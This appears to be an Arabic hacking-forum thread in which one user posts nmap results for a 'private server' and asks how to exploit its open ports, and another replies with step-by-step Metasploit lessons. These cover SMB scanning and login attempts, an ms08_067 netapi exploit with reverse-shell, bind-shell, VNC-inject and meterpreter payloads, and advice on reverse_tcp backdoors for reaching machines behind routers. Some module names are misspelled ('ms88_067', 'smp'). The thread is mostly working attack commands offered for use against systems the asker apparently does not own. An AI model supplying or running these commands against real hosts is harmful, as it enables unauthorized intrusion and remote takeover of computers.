![]() |
فحص السيرفر سيرفر خاص هاذا الفحص http://v4-team.com/cc/images/smilies/biggrin.gif مالعمل http://v4-team.com/cc/images/smilies/biggrin.gif PORT STATE SERVICE VERSION 80/tcp open http? 3128/tcp open squid-http? فحص nmapsmilies7 |
|
Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http 3128/tcp open squid-http 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 91.97 seconds Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http? 3128/tcp open squid-http? 8080/tcp open http-proxy? 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/ser vicefp-submit.cgi : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=4.76%I=7%D=7/18%Time=4C43417F%P=i686-pc-windows-windows%r( SF:GetRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x20tex SF:t/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20Reque SF:st</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Request SF:</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>\n") SF:%r(HTTPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x2 SF:0text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20R SF:equest</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Req SF:uest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML> SF:\n")%r(RTSPRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type SF::\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\ SF:x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x2 SF:0Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></H SF:TML>\n")%r(FourOhFourRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nCo SF:ntent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x204 SF:00\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400 SF:\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ . SF:</BODY></HTML>\n")%r(SIPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\ SF:nContent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x SF:20400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20 SF:400\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malforme SF:d\.</BODY></HTML>\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3128-TCP:V=4.76%I=7%D=7/18%Time=4C43417F%P=i686-pc-windows-windows% SF:r(GetRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x20t SF:ext/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20Req SF:uest</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Reque SF:st</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>\n SF:")%r(HTTPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\ SF:x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x2 SF:0Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20R SF:equest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTM SF:L>\n")%r(Socks5,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x SF:20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20 SF:Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Re SF:quest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML SF:>\n")%r(RTSPRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Typ SF:e:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad SF:\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x SF:20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></ SF:HTML>\n")%r(FourOhFourRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nC SF:ontent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20 SF:400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2040 SF:0\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ SF:.</BODY></HTML>\n")%r(SIPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request SF:\nContent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\ SF:x20400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2 SF:0400\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malform SF:ed\.</BODY></HTML>\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8080-TCP:V=4.76%I=7%D=7/18%Time=4C43417F%P=i686-pc-windows-windows% SF:r(GetRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\x20t SF:ext/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x20Req SF:uest</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20Reque SF:st</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTML>\n SF:")%r(HTTPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Type:\ SF:x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Bad\x2 SF:0Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\x20R SF:equest</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY></HTM SF:L>\n")%r(RTSPRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nContent-Ty SF:pe:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20400\x20Ba SF:d\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x20400\x20Bad\ SF:x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ .</BODY>< SF:/HTML>\n")%r(FourOhFourRequest,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\n SF:Content-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x2 SF:0400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x204 SF:00\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed SF:\.</BODY></HTML>\n")%r(Socks5,CC,"HTTP/1\.0\x20400\x20Bad\x20Request\nC SF:ontent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\x20 SF:400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2040 SF:0\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malformed\ SF:.</BODY></HTML>\n")%r(SIPOptions,CC,"HTTP/1\.0\x20400\x20Bad\x20Request SF:\nContent-Type:\x20text/html\n\n<HTML><HEAD><TITLE>SAWA\x20Filter\x20-\ SF:x20400\x20Bad\x20Request</TITLE></HEAD><BODY><H1>SAWA\x20Filter\x20-\x2 SF:0400\x20Bad\x20Request</H1>\x20The\x20requested\x20URL\x20is\x20malform SF:ed\.</BODY></HTML>\n"); Service detection performed. Please report any incorrect results at http://nmap. org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 136.15 seconds |
اقتباس:
ولاكن انا فحصت السيرفر 80/tcp open http 3128/tcp open squid-http 8080/tcp open http-proxy وطلعت البورتات المفتوحة هدول فقط كيف بدي استغل البورتات هدول شوفت عينك السيرفر خاص للعلم وجزيل الشكر اخي الكريم بالمناسبة موضوع المجهول روعة smilies14 |
|
. search portscan use scanner/portscan/tcp show options set rhosts 192.168.1.102 run الدرس الثاني use scanner/smb/version show options set RHOST 192.168.1.102 run الدرس الثالث show auxiliary use scanner/smb/login show options set RHOSTS 192.168.1.0-10 set SMBUser pentest run إنتهى use windows/smp/ms88_067_netapi show options set RHOST 192.168.1.102 set payload windows/shell/reverهذا الأمر يمكن بدل reverse الأخير show options set RHOST 192.168.1.3 exploit الإقتحام ipconfig الدرس الي بعدو use windows/smp/ms88_067_netapi show options set RHOST 192.168.1.102 set payload windows/shell/bind show options exploit ipconfig الدرس الذي يليه use windows/smp/ms88_067_netapi show options set RHOST 192.168.1.102 set payload windows/vncinject/reverse_tcp show options set lHOST 192.168.1.103 exploit تم الأقتحام use windows/smp/ms88_067_netapi show options set RHOST 192.168.1.102 set payload windows/meterpreter/reverse_tcpoit show options set lHOST 192.168.1.103 exploit help ps meterpreter >>migrate 1544 أخي الحبيب بوركت بجد وجزيل الشكر على الدروس والخلاصة منهم انا بكمل دروسك وبرجع بأستفسارات معينة ان شاء الله |
http://www.vbspiders.com/vb/t24546.html use autopwn اخي الكريم انت اخبرتني تابع هذا ورح اتابعه ولاكن بالدروس الي قبل هذا اخي الكريم انت تخترق داخل نطاق الشبكة الداخلية اي تحت الراوتر طيب لو نحنا بدنا نخترق خارج الشبكة ماذا نعم هوه سؤال بسيط وجوابه اسهل نأخذ الأيبي الحقيقي للجهاز ولاكن سؤالي هل تنفع في الشبكة الخارجية وأعتذر منك لأني كنت بطبق على الشبكة الداخلية وتمام مشي الحال ولاكن اليوم فرمتت ولم تسنح لي الفرصة اجرب خارج نطاق الشبكة الداخلية جزيل الشكر مرة اخرى |
تستطيع الاختراق خارج الشبكة بشروط : اذا كنت مستهدف سرفر . لان السرفر يكون الip ثابت . تستطيع اختراق جهاز شرط(يكون الip ثابت). تستطيع اختراق جهاز خلف router باستخدام payload reverse_tcp يعني backdoor reverse connection windows/meterpreter/reverse_tcp or windows/shell/reverse_tcp or linux http://www.vbspiders.com/vb/t32383.html |
اتمنى اكون ساعدتك |
بوركت اخي الحبيب وحياك الله وجزيل الشكر بالفعل ساعدتني وجزيل الشكر هذا اخي امر تشغيل أداة dmitry فحص السيرفر رائع عليها شوفها يمكن بتعرفها ولكن حبيت ابادلك بشي من اي شي علمتني ايا مشكور اخي dmitry -winsepffb -o host.txt google.com |
الساعة الآن 01:24 PM |
[ vBspiders.Com Network ]